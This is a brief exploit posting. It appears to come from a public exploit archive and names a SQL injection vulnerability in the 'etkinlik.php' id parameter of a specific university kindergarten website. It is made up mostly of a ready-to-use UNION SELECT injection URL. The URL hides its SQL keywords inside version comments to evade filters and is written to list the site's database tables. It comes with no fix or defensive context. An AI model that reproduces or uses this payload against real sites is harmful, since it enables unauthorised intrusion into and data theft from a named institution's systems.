# Exploit Title: SQL Injection in “ http://anaokulu.kocaeli.edu.tr “ #----------------------------------------------------------------------------------------- # Exploit Author: Prototyqe/Furkan Özer #----------------------------------------------------------------------------------------- # Date: 08.06.2019 #----------------------------------------------------------------------------------------- # Category: Web Application #----------------------------------------------------------------------------------------- # Vulnerability Path: http://anaokulu.kocaeli.edu.tr/etkinlik.php?title=23_nisan_gosterisi&id=[SQL] #----------------------------------------------------------------------------------------- #http://anaokulu.kocaeli.edu.tr/etkinlik.php?title=23_nisan_gosterisi&id=696%27/*!50000UnIoN*/%20/*!50000SeLeCT*/%200,group_concat(table_name),2,3,4,5,6,7,8,9%20from%20/*!50000inFoRMAtiON_SchEMA.TabLEs%20where%20table_schema=database()*/%20--%20proto #-----------------------------------------------------------------------------------------